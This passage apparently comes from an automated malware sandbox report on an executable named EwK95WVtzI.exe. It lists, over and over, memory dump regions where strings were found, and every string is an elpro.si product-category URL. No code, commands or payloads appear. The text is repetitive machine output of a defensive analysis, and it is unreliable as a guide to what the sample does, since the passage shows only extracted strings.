00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/fcm-ec-1935-2004/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-11140-4/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-15883/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-17665/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-461f/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-810g/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-60529/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-61515/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/digita
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/modula
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/nadzor
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/ostalo
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/pisaln
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/prosto
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 